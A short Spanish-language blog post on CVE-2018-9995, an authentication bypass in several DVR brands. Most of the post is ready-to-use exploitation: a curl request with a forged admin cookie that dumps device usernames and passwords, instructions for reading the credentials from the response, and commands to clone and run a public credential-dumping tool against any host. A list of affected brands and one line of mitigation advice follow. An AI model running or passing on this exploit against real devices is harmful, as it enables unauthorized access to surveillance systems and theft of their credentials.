DVRs en riesgo

By | 2018-05-03

Basado en el CVE-2018-9995 cargado por un investigador de seguridad  informática hace ya un mes, se encontró que múltiples DVRs eran vulnerables a “bypass authentication”, para ello creo una aplicación llamada “Gets DVR Credentials” con la cual se puede acceder a los mismos.

Para probar el exploit simplemente se debe ejecutar:

curl "http://[HOST/IP]:[PUERTO]/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Como resultado de dicha ejecución van a obtener varios datos, los que nos interesan son uid y pwd; estos dos parámetros están seguidos de un valor entre comillas que son las credenciales.

En caso de querer utilizar la aplicación antes mencionada deben ejecutar los siguientes comandos:

// Instalación
git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
cd CVE-2018-9995_dvr_credentials
pip install -r requirements.txt

// Prueba
python getDVR_Credentials.py --host [HOST/IP] --port [PUERTO]

Las marcas afectadas comprobadas hasta el momento son:

  • TBK
  • Novo
  • CeNova
  • QSee
  • Pulnix
  • XVR 5 in 1
  • Securus
  • Night OWL
  • DVR Login
  • HVR Login
  • MDVR Login

Como siempre, para estos casos, la recomendación es filtrar por IPs de confianza, asi solamente pueden tener accedo dichas IPs y no cualquier persona que navega por internet.

Fuente: Redes Zone

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.